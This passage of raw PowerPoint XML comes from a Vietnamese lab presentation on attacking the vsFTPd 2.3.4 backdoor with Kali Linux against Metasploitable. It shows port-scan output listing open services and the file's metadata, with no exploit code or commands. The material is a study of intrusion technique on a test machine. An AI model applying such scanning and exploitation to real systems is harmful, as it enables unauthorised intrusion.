            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   	open 		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   	open  		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>111/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 	 open  		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>139/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  	open  		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>445/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  	open  		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>512/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  	open  		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>513/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  	open  		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>514/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  	open  		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1099/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 	open  		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1524/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 	open 		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382617395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335</TotalTime>
  <Words>2303</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>216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 Unicode MS</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Facet</vt:lpstr>
      <vt:lpstr>Nghiên cứu thực nghiệm tấn công vsFTPd 2.3.4 với kịch bản tấn công kali linux và metasploitable</vt:lpstr>
      <vt:lpstr>Nghiên cứu thực nghiệm khai thác  tấn công lỗ hổng vsFTPd 2.3.4</vt:lpstr>
      <vt:lpstr>Mục tiêu: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trung nguyen</dc:creator>
  <cp:lastModifiedBy>trung nguyen</cp:lastModifiedBy>
  <cp:revision>61</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-19T09:03:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-09T15:19:55Z</dcterms:modified>
</cp:coreProperties>
</file>